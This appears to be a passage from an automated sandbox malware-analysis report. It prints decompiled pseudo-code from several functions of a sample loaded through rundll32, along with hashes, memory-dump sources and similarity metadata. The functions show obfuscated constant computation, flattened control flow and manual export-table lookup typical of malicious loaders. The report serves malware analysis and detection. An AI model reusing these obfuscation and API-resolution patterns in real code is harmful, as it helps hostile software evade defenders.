                                                                      • Instruction ID: c7eb2fda4de8f23e86eaf8a6801956826f5e5c0592799e48bf45350fe949c175
                                                                      • Opcode Fuzzy Hash: 2ab281e20babec8f914e23fe26d2a0305b4f6cc775f439d274d1a935f3a080a8
                                                                      • Instruction Fuzzy Hash: 81511271C0131AEBEF19CFA5D94A5EEBBB1FF04304F208199D515B62A0D7B90A5ACF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 84%
                                                                      			E02003F4F(signed int __ecx, intOrPtr* __edx) {
                                                                      				char _v520;
                                                                      				signed int _v524;
                                                                      				intOrPtr _v528;
                                                                      				signed int _v532;
                                                                      				signed int _v536;
                                                                      				signed int _v540;
                                                                      				signed int _v544;
                                                                      				signed int _v548;
                                                                      				signed int _v552;
                                                                      				signed int _v556;
                                                                      				signed int _v560;
                                                                      				signed int _v564;
                                                                      				signed int _t63;
                                                                      				signed int _t65;
                                                                      				signed int _t69;
                                                                      				signed int _t70;
                                                                      				void* _t79;
                                                                      				signed int _t80;
                                                                      				void* _t81;
                                                                      				signed int _t84;
                                                                      				intOrPtr* _t87;
                                                                      				signed int* _t88;
                                                                      
                                                                      				_t70 = __ecx;
                                                                      				_t88 =  &_v564;
                                                                      				_v524 = _v524 & 0x00000000;
                                                                      				_v528 = 0x208792;
                                                                      				_v540 = 0xd4e9;
                                                                      				_v540 = _v540 + 0xffffc88b;
                                                                      				_v540 = _v540 ^ 0x0000d9d0;
                                                                      				_v532 = 0x336b;
                                                                      				_v532 = _v532 | 0xfe809e09;
                                                                      				_v532 = _v532 ^ 0xfe80eed9;
                                                                      				_v564 = 0x8dd7;
                                                                      				_v564 = _v564 << 9;
                                                                      				_v564 = _v564 ^ 0x316f6ec5;
                                                                      				_v564 = _v564 + 0xffffc640;
                                                                      				_v564 = _v564 ^ 0x307484c3;
                                                                      				_v536 = 0x3e91;
                                                                      				_v536 = _v536 + 0xa90d;
                                                                      				_v536 = _v536 ^ 0x0000a803;
                                                                      				_v560 = 0xf01b;
                                                                      				_v560 = _v560 << 0x10;
                                                                      				_v560 = _v560 * 0x4f;
                                                                      				_t87 = __edx;
                                                                      				_v560 = _v560 ^ 0x18550a74;
                                                                      				_t69 = __ecx;
                                                                      				_v552 = 0x212a;
                                                                      				_t81 = 0x2a877a8b;
                                                                      				_v552 = _v552 * 0x19;
                                                                      				_v552 = _v552 ^ 0x00030550;
                                                                      				_v544 = 0xd358;
                                                                      				_v544 = _v544 | 0x5b8e85e0;
                                                                      				_v544 = _v544 ^ 0x5b8ed83a;
                                                                      				_v556 = 0x81e1;
                                                                      				_v556 = _v556 ^ 0x5f3d7dd3;
                                                                      				_v556 = _v556 ^ 0x5f3de0ae;
                                                                      				_t80 = _v556;
                                                                      				_v548 = 0x11a6;
                                                                      				_v548 = _v548 << 1;
                                                                      				_v548 = _v548 ^ 0x000056ff;
                                                                      				while(_t81 != 0xa9a8994) {
                                                                      					if(_t81 == 0x1592b590) {
                                                                      						_push( &_v520);
                                                                      						_t63 = E0200B165(_t69, _t87);
                                                                      						asm("sbb esi, esi");
                                                                      						_t70 = 0x1ff1020;
                                                                      						_t84 =  ~_t63 & 0xf51449f8;
                                                                      						L9:
                                                                      						_t81 = _t84 + 0x29fbdc3d;
                                                                      						continue;
                                                                      					}
                                                                      					if(_t81 == 0x1f102635) {
                                                                      						_push(0);
                                                                      						_push(0);
                                                                      						_push(_v544);
                                                                      						_push(_v552);
                                                                      						_push(_v560);
                                                                      						_push(_v536);
                                                                      						_push( &_v520);
                                                                      						_push(0);
                                                                      						_t65 = E01FF6417(_v564, __eflags);
                                                                      						_t88 =  &(_t88[8]);
                                                                      						asm("sbb esi, esi");
                                                                      						_t84 =  ~_t65 & 0xe09ead57;
                                                                      						__eflags = _t84;
                                                                      						goto L9;
                                                                      					}
                                                                      					if(_t81 == 0x29fbdc3d) {
                                                                      						return E01FFDE81(_v556, _t80, _v548);
                                                                      					}
                                                                      					if(_t81 != 0x2a877a8b) {
                                                                      						L12:
                                                                      						__eflags = _t81 - 0x1e6f5ee2;
                                                                      						if(__eflags != 0) {
                                                                      							continue;
                                                                      						} else {
                                                                      							return _t65;
                                                                      						}
                                                                      						L15:
                                                                      						return _t65;
                                                                      					}
                                                                      					_t79 = 0x50;
                                                                      					_t65 = E01FF54FB(_t79);
                                                                      					_t80 = _t65;
                                                                      					_t70 = _t70;
                                                                      					if(_t80 != 0) {
                                                                      						_t81 = 0x1592b590;
                                                                      						continue;
                                                                      					}
                                                                      					goto L15;
                                                                      				}
                                                                      				 *((intOrPtr*)(_t80 + 0x44)) = _t69;
                                                                      				_t81 = 0x1e6f5ee2;
                                                                      				 *_t80 =  *0x2011084;
                                                                      				 *0x2011084 = _t80;
                                                                      				goto L12;
                                                                      			}


























                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *!$k3
                                                                      • API String ID: 0-1396716965
                                                                      • Opcode ID: 7d0b1fc123c8e7fa04d11ad868293d2a6e674a265442b316f67264ab0fb49612
                                                                      • Instruction ID: 7f518d9b9bc8b147eb0af21d60fd201e909b162b092945691d45f6ac3d24a309
                                                                      • Opcode Fuzzy Hash: 7d0b1fc123c8e7fa04d11ad868293d2a6e674a265442b316f67264ab0fb49612
                                                                      • Instruction Fuzzy Hash: B541D0728083018FE355CF15D88555BFBE0FB94358F014A1DE6D9AB2A0D3B58A49CF87
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *!$k3
                                                                      • API String ID: 0-1396716965
                                                                      • Opcode ID: eae0f129622ca1be1331d6256decdb13aa3d9fafa60389adb5a47b4304c4b6e5
                                                                      • Instruction ID: 34966487475ab03651524f21114365b20cb9e5fcf188754d6daa5beee3caf3fd
                                                                      • Opcode Fuzzy Hash: eae0f129622ca1be1331d6256decdb13aa3d9fafa60389adb5a47b4304c4b6e5
                                                                      • Instruction Fuzzy Hash: DE41CC724083129BD318DF15D88555BFBE0FB88358F124A1DF5D9AB2A0D3B48A5A8F86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E01FF3938(intOrPtr __ecx, void* __edx) {
                                                                      				intOrPtr _t84;
                                                                      				void* _t89;
                                                                      				void* _t95;
                                                                      				signed int _t97;
                                                                      				signed int _t98;
                                                                      				signed int _t112;
                                                                      				intOrPtr _t113;
                                                                      				intOrPtr _t116;
                                                                      				void* _t117;
                                                                      				void* _t118;
                                                                      
                                                                      				_t116 =  *((intOrPtr*)(_t117 + 0x38));
                                                                      				_push( *((intOrPtr*)(_t117 + 0x44)));
                                                                      				 *((intOrPtr*)(_t117 + 0x24)) = __ecx;
                                                                      				_push(_t116);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(__ecx);
                                                                      				 *((intOrPtr*)(_t117 + 0x44)) = 0x4b2d38;
                                                                      				_t118 = _t117 + 0x10;
                                                                      				_t113 = 0;
                                                                      				 *((intOrPtr*)(_t118 + 0x38)) = 0;
                                                                      				 *(_t118 + 0x14) = 0x6eb8;
                                                                      				 *(_t118 + 0x14) =  *(_t118 + 0x14) ^ 0x7c344bdb;
                                                                      				_t97 = 0x3d;
                                                                      				 *(_t118 + 0x18) =  *(_t118 + 0x14) / _t97;
                                                                      				 *(_t118 + 0x18) =  *(_t118 + 0x18) ^ 0x02096a70;
                                                                      				 *(_t118 + 0x14) = 0xfd73;
                                                                      				 *(_t118 + 0x14) =  *(_t118 + 0x14) ^ 0xa1be20cb;
                                                                      				 *(_t118 + 0x14) =  *(_t118 + 0x14) >> 0xf;
                                                                      				_t98 = 0x57;
                                                                      				 *(_t118 + 0x10) =  *(_t118 + 0x14) / _t98;
                                                                      				 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x00004917;
                                                                      				 *(_t118 + 0x40) = 0x3423;
                                                                      				 *(_t118 + 0x40) =  *(_t118 + 0x40) ^ 0xab2a12e8;
                                                                      				 *(_t118 + 0x40) =  *(_t118 + 0x40) | 0xd17ac73e;
                                                                      				 *(_t118 + 0x40) =  *(_t118 + 0x40) + 0xffff5f1a;
                                                                      				 *(_t118 + 0x40) =  *(_t118 + 0x40) ^ 0xfb7a79e5;
                                                                      				 *(_t118 + 0x1c) = 0x40db;
                                                                      				 *(_t118 + 0x1c) =  *(_t118 + 0x1c) >> 0xa;
                                                                      				 *(_t118 + 0x1c) =  *(_t118 + 0x1c) ^ 0x00005dd2;
                                                                      				 *(_t118 + 0x18) = 0xa0e8;
                                                                      				 *(_t118 + 0x18) =  *(_t118 + 0x18) ^ 0x870d9e5e;
                                                                      				 *(_t118 + 0x18) =  *(_t118 + 0x18) ^ 0x870d3eb6;
                                                                      				_t84 =  *((intOrPtr*)(_t116 + 0x3c));
                                                                      				_t112 =  *(_t118 + 0x18);
                                                                      				 *((intOrPtr*)(_t118 + 0x30)) = _t84;
                                                                      				_t95 =  *((intOrPtr*)(_t84 + _t116 + 0x78)) + _t116;
                                                                      				 *((intOrPtr*)(_t118 + 0x2c)) =  *((intOrPtr*)(_t95 + 0x1c)) + _t116;
                                                                      				_t100 =  *((intOrPtr*)(_t95 + 0x20)) + _t116;
                                                                      				 *((intOrPtr*)(_t118 + 0x24)) =  *((intOrPtr*)(_t95 + 0x20)) + _t116;
                                                                      				 *((intOrPtr*)(_t118 + 0x28)) =  *((intOrPtr*)(_t95 + 0x24)) + _t116;
                                                                      				while(_t112 <  *((intOrPtr*)(_t95 + 0x18))) {
                                                                      					_t89 = E02002497( *((intOrPtr*)(_t100 + _t112 * 4)) + _t116,  *((intOrPtr*)(_t118 + 0x24)),  *(_t118 + 0x1c),  *((intOrPtr*)(_t118 + 0x28)),  *((intOrPtr*)(_t118 + 0x44)),  *(_t118 + 0x1c));
                                                                      					_t118 = _t118 + 0x10;
                                                                      					if(_t89 == 0) {
                                                                      						_t113 =  *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x2c)) + ( *( *((intOrPtr*)(_t118 + 0x28)) + _t112 * 2) & 0x0000ffff) * 4)) + _t116;
                                                                      						if(_t113 >= _t95) {
                                                                      							_t113 =  <  ? 0 : _t113;
                                                                      						}
                                                                      						L7:
                                                                      						return _t113;
                                                                      					}
                                                                      					_t100 =  *((intOrPtr*)(_t118 + 0x24));
                                                                      					_t112 = _t112 + 1;
                                                                      				}
                                                                      				goto L7;
                                                                      			}














                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #4$8-K
                                                                      • API String ID: 0-2690090699
                                                                      • Opcode ID: fea5701da5a9700051d942127ae9cea1d7486b1558de5fec2ebc5bc002ed8a6a
                                                                      • Instruction ID: 7bbdc4876e1745939573ee3a168de874838521339d813c76de2483955a2e7f11
                                                                      • Opcode Fuzzy Hash: fea5701da5a9700051d942127ae9cea1d7486b1558de5fec2ebc5bc002ed8a6a
                                                                      • Instruction Fuzzy Hash: 884134B1A083019FD318CF29C88541BBBE1EF88748F00496DF995A7261D772EA59CF96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #4$8-K
                                                                      • API String ID: 0-2690090699
                                                                      • Opcode ID: 9d935698cac112b8a835fd4d56c32ee63574270cee71746eaa1e1968735281d7
                                                                      • Instruction ID: ea19f5e6d77a7548a361ac06bd6c587867e2c5013f72b19a40d762b37b586bb5
                                                                      • Opcode Fuzzy Hash: 9d935698cac112b8a835fd4d56c32ee63574270cee71746eaa1e1968735281d7
                                                                      • Instruction Fuzzy Hash: E74176B16083019FD718CF29C98181BBBF1FB88748F00092EF98597261C771EA69CF96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 97%
                                                                      			E0200C192(intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				char _v44;
                                                                      				intOrPtr _v48;
                                                                      				char _v52;
                                                                      				char _v116;
                                                                      				void* _t95;
                                                                      				signed int _t104;
                                                                      				void* _t107;
                                                                      				intOrPtr _t116;
                                                                      
                                                                      				_v8 = 0x9f81;
                                                                      				_v8 = _v8 << 8;
                                                                      				_v8 = _v8 ^ 0x31dab1ca;
                                                                      				_v8 = _v8 >> 4;
                                                                      				_v8 = _v8 ^ 0x03147ff0;
                                                                      				_v20 = 0xa808;
                                                                      				_v20 = _v20 | 0xee8c9d34;
                                                                      				_v20 = _v20 >> 4;
                                                                      				_v20 = _v20 ^ 0x0ee8e1a4;
                                                                      				_v40 = 0x98c1;
                                                                      				_v40 = _v40 + 0xffff69a9;
                                                                      				_v40 = _v40 ^ 0x000017b7;
                                                                      				_v36 = 0x182a;
                                                                      				_v36 = _v36 >> 7;
                                                                      				_v36 = _v36 ^ 0x00005093;
                                                                      				_v24 = 0xa138;
                                                                      				_v24 = _v24 + 0x4d23;
                                                                      				_t104 = 0x57;
                                                                      				_t116 = _a4;
                                                                      				_v24 = _v24 / _t104;
                                                                      				_v24 = _v24 ^ 0x00001377;
                                                                      				_v12 = 0x3e71;
                                                                      				_v12 = _v12 << 3;
                                                                      				_v12 = _v12 << 4;
                                                                      				_v12 = _v12 >> 7;
                                                                      				_v12 = _v12 ^ 0x00005605;
                                                                      				_v16 = 0x4dd8;
                                                                      				_v16 = _v16 | 0x590e6d8f;
                                                                      				_v16 = _v16 * 0x47;
                                                                      				_v16 = _v16 * 0x3d;
                                                                      				_v16 = _v16 ^ 0xa71caf0d;
                                                                      				_v32 = 0x3ec3;
                                                                      				_v32 = _v32 << 3;
                                                                      				_v32 = _v32 | 0x7ba18124;
                                                                      				_v32 = _v32 ^ 0x7ba1e0dd;
                                                                      				_v28 = 0xb72f;
                                                                      				_v28 = _v28 + 0x7494;
                                                                      				_v28 = _v28 ^ 0xe721bd43;
                                                                      				_v28 = _v28 ^ 0xe720bd0c;
                                                                      				_t95 =  *((intOrPtr*)(_t116 + 0x18))( *((intOrPtr*)(_t116 + 8)), 1, 0);
                                                                      				_t119 = _t95;
                                                                      				if(_t95 != 0) {
                                                                      					E02004C37( &_v116, _v8, _v20);
                                                                      					_pop(_t107);
                                                                      					_v52 =  &_v116;
                                                                      					_v48 = E0200A966(_v40, _v36, _t119, _t107, _v24, _v12);
                                                                      					 *((intOrPtr*)(_t116 + 0x18))( *((intOrPtr*)(_t116 + 8)), 0xa,  &_v52,  &_v44);
                                                                      					E02000D6D(_v16, _v32, _v28, _v48);
                                                                      				}
                                                                      				return 0;
                                                                      			}





















                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #M$q>
                                                                      • API String ID: 0-3778844937
                                                                      • Opcode ID: e014fd25fd94ebfb7f6ea6ba12767a06829e02c2ca803fd4af27c54cc90a2fb3
                                                                      • Instruction ID: 34200413d3d4ea7366a10ce3ce627bba55cd802c944fd4b498d89dfb7702f9e1
                                                                      • Opcode Fuzzy Hash: e014fd25fd94ebfb7f6ea6ba12767a06829e02c2ca803fd4af27c54cc90a2fb3
                                                                      • Instruction Fuzzy Hash: 0441F372C0020DABEF19DFA1C94A8EEFBB5FF04304F208159D522B62A0D7B95A05DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #M$q>
                                                                      • API String ID: 0-3778844937
                                                                      • Opcode ID: a1e8801eff8f8b6530ebe58d1d0d3bbce165d8e7055afb7e7f6b6bc2d86411b5
                                                                      • Instruction ID: 47096adbe5e23c41e35f2eed629dc8690c6886d85febce40a95ce75428fe00e1
                                                                      • Opcode Fuzzy Hash: a1e8801eff8f8b6530ebe58d1d0d3bbce165d8e7055afb7e7f6b6bc2d86411b5
                                                                      • Instruction Fuzzy Hash: 35410472C0020DABDF09DFA1C94A8EEFBB4FF14304F208559D522B62A0D7B95A55CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E02000672(void* __ecx) {
                                                                      				signed int _v4;
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				unsigned int _v24;
                                                                      				void* _t60;
                                                                      				signed int _t63;
                                                                      				void* _t65;
                                                                      				void* _t71;
                                                                      				void* _t72;
                                                                      				unsigned int* _t74;
                                                                      
                                                                      				_t65 = __ecx;
                                                                      				_t74 =  &_v24;
                                                                      				_v16 = 0xc222;
                                                                      				_v16 = _v16 | 0x2c4811a6;
                                                                      				_v16 = _v16 + 0xffff2ea9;
                                                                      				_v16 = _v16 ^ 0x2c485227;
                                                                      				_v4 = 0x52bd;
                                                                      				_v4 = _v4 ^ 0x701b7809;
                                                                      				_v4 = _v4 ^ 0x701b4439;
                                                                      				_v8 = 0x440a;
                                                                      				_t63 = 0x3c;
                                                                      				_t71 = 0;
                                                                      				_v8 = _v8 / _t63;
                                                                      				_t72 = 0x1db47164;
                                                                      				_v8 = _v8 ^ 0x0000441a;
                                                                      				_v24 = 0x7d6d;
                                                                      				_v24 = _v24 + 0xffffc5c3;
                                                                      				_v24 = _v24 >> 2;
                                                                      				_v24 = _v24 + 0xffffb313;
                                                                      				_v24 = _v24 ^ 0xffffe3d6;
                                                                      				_v12 = 0x8699;
                                                                      				_v12 = _v12 + 0xfffff638;
                                                                      				_v12 = _v12 ^ 0x3f0bf62e;
                                                                      				_v12 = _v12 ^ 0x3f0bf546;
                                                                      				_v20 = 0x2aa4;
                                                                      				_v20 = _v20 + 0xffff16b8;
                                                                      				_v20 = _v20 >> 8;
                                                                      				_v20 = _v20 * 0x5b;
                                                                      				_v20 = _v20 ^ 0x5affa7fd;
                                                                      				do {
                                                                      					while(_t72 != 0xffebff) {
                                                                      						if(_t72 == 0x1db47164) {
                                                                      							_t72 = 0xffebff;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t72 != 0x28d16d2c) {
                                                                      								goto L8;
                                                                      							} else {
                                                                      								_t71 = _t71 + E02006B54(_t65 + 4, _v12, _v20);
                                                                      							}
                                                                      						}
                                                                      						L5:
                                                                      						return _t71;
                                                                      					}
                                                                      					_t60 = E02002493();
                                                                      					_t74 = _t74 - 0xc + 0xc;
                                                                      					_t72 = 0x28d16d2c;
                                                                      					_t71 = _t71 + _t60;
                                                                      					L8:
                                                                      				} while (_t72 != 0x306bf85d);
                                                                      				goto L5;
                                                                      			}
















                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 'RH,$m}
                                                                      • API String ID: 0-2515829961
                                                                      • Opcode ID: 9c116aca3ec0e0372c49209bd39f855765885274787401dbb57e67fa70514153
                                                                      • Instruction ID: e1237506397d8c8bc3f4ee58e299ad9b5d85f4f372d38687a1c8b7edcf628da9
                                                                      • Opcode Fuzzy Hash: 9c116aca3ec0e0372c49209bd39f855765885274787401dbb57e67fa70514153
                                                                      • Instruction Fuzzy Hash: C9316E729093028BE364DF28E88550BFBE1BBC4714F114A2DE5D9A3260D3759A098F93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 'RH,$m}
                                                                      • API String ID: 0-2515829961
                                                                      • Opcode ID: 9c116aca3ec0e0372c49209bd39f855765885274787401dbb57e67fa70514153
                                                                      • Instruction ID: 4a3fdf8551dd2161e5c8d4c372bcb364cf34f9435d668468c7e62f635a9d8fce
                                                                      • Opcode Fuzzy Hash: 9c116aca3ec0e0372c49209bd39f855765885274787401dbb57e67fa70514153
                                                                      • Instruction Fuzzy Hash: 2D316EB29093068BD364DE29E54540BFBE0BBD4714F114A2DE9D5A3260D3B58A198F93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *!$k3
                                                                      • API String ID: 0-1396716965
                                                                      • Opcode ID: 424d58d99afbab0889c77edd62e26163cf9f9c37bbf812761af42d48eba7e0d8
                                                                      • Instruction ID: 4edee88e6a4cb64f55211fa3ea517c23a493d99d838bed560c24fd7fe0c3b96f
                                                                      • Opcode Fuzzy Hash: 424d58d99afbab0889c77edd62e26163cf9f9c37bbf812761af42d48eba7e0d8
                                                                      • Instruction Fuzzy Hash: D5313A724083029FD318DF29D44941BFBE4BB94758F518A0DF1D59B2A1D3B48A4ACF87
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E02004A9E(void* __edx, void* __eflags, signed int* _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				intOrPtr _v44;
                                                                      				void* __ecx;
                                                                      				void* _t100;
                                                                      				intOrPtr _t114;
                                                                      				signed int _t117;
                                                                      				signed int _t123;
                                                                      				signed int _t124;
                                                                      				signed int _t125;
                                                                      				signed int _t126;
                                                                      				void* _t142;
                                                                      				intOrPtr _t143;
                                                                      				intOrPtr _t147;
                                                                      
                                                                      				_push(_a16);
                                                                      				_push(0x2010000);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				E02002550(_t100);
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				_v44 = 0x156874;
                                                                      				_v20 = 0x9c2a;
                                                                      				_v20 = _v20 << 5;
                                                                      				_t123 = 0x35;
                                                                      				_v20 = _v20 / _t123;
                                                                      				_v20 = _v20 ^ 0x00002bb4;
                                                                      				_v36 = 0xf1e6;
                                                                      				_v36 = _v36 + 0xffff56d9;
                                                                      				_v36 = _v36 ^ 0x00000861;
                                                                      				_v8 = 0x90c5;
                                                                      				_t124 = 0x75;
                                                                      				_v8 = _v8 * 0xa;
                                                                      				_v8 = _v8 ^ 0x847d0871;
                                                                      				_v8 = _v8 + 0xb0b6;
                                                                      				_v8 = _v8 ^ 0x847969bf;
                                                                      				_v32 = 0xdffe;
                                                                      				_t125 = 0x5f;
                                                                      				_v32 = _v32 / _t124;
                                                                      				_v32 = _v32 ^ 0x21a7c3f7;
                                                                      				_v32 = _v32 ^ 0x21a7f23e;
                                                                      				_v28 = 0x83e8;
                                                                      				_v28 = _v28 >> 0xe;
                                                                      				_v28 = _v28 ^ 0xeff97ecd;
                                                                      				_v28 = _v28 ^ 0xeff95885;
                                                                      				_v16 = 0x2648;
                                                                      				_v16 = _v16 * 0x3e;
                                                                      				_t126 = 9;
                                                                      				_v16 = _v16 / _t125;
                                                                      				_v16 = _v16 ^ 0x58b3f5ba;
                                                                      				_v16 = _v16 ^ 0x58b39d5c;
                                                                      				_v12 = 0x62ef;
                                                                      				_v12 = _v12 | 0xb941bdbf;
                                                                      				_v12 = _v12 << 7;
                                                                      				_v12 = _v12 | 0x29e74872;
                                                                      				_v12 = _v12 ^ 0xa9ffcd1d;
                                                                      				_v24 = 0x928c;
                                                                      				_v24 = _v24 / _t126;
                                                                      				_v24 = _v24 + 0xb150;
                                                                      				_v24 = _v24 ^ 0x0000c198;
                                                                      				_t142 = 0x34;
                                                                      				_t114 = E01FF54FB(_t142);
                                                                      				 *0x201108c = _t114;
                                                                      				if(_t114 == 0) {
                                                                      					L7:
                                                                      					return 0;
                                                                      				}
                                                                      				 *((intOrPtr*)(_t114 + 0x20)) = 0x2010000;
                                                                      				 *((intOrPtr*)(_t114 + 0x24)) = 0x2010000;
                                                                      				_t143 =  *0x201108c;
                                                                      				_t147 =  *((intOrPtr*)(_t143 + 0x20));
                                                                      				 *(_t143 + 4) = _v24;
                                                                      				_t117 =  *(_t143 + 0x14);
                                                                      				while( *((intOrPtr*)(_t147 + _t117 * 8)) != 0) {
                                                                      					_t117 = _t117 + 1;
                                                                      					 *(_t143 + 0x14) = _t117;
                                                                      				}
                                                                      				if(E01FF67EF(_a4, _v8, _v32, _v28) == 0) {
                                                                      					E01FFDE81(_v16,  *0x201108c, _v12);
                                                                      					goto L7;
                                                                      				}
                                                                      				return 1;
                                                                      			}

























                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: rH)
                                                                      • API String ID: 0-3429678651
                                                                      • Opcode ID: a4336280ae81ac6a4a3b290b08724f85ebff7e0f81ff02567f12bb6ccab53824
                                                                      • Instruction ID: 7214109069f9fad5add82d30ed37ca4725c174400a7585d0b61fd3eb27913170
                                                                      • Opcode Fuzzy Hash: a4336280ae81ac6a4a3b290b08724f85ebff7e0f81ff02567f12bb6ccab53824
                                                                      • Instruction Fuzzy Hash: D7513675D0030AEFEB08CFA4C9455AEBBB1FF44310F208159D515AB2A0DBB99A45CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: rH)
                                                                      • API String ID: 0-3429678651
                                                                      • Opcode ID: a9c3be9c37764caaac0b5c82abcb2aefc8fd1c7a0dc47e201cdc7581efa4c114
                                                                      • Instruction ID: 7354fe3c1ef40b1cded09fd10f1bd40bcbb76b1f837cb96132a612beaf0a9fb8
                                                                      • Opcode Fuzzy Hash: a9c3be9c37764caaac0b5c82abcb2aefc8fd1c7a0dc47e201cdc7581efa4c114
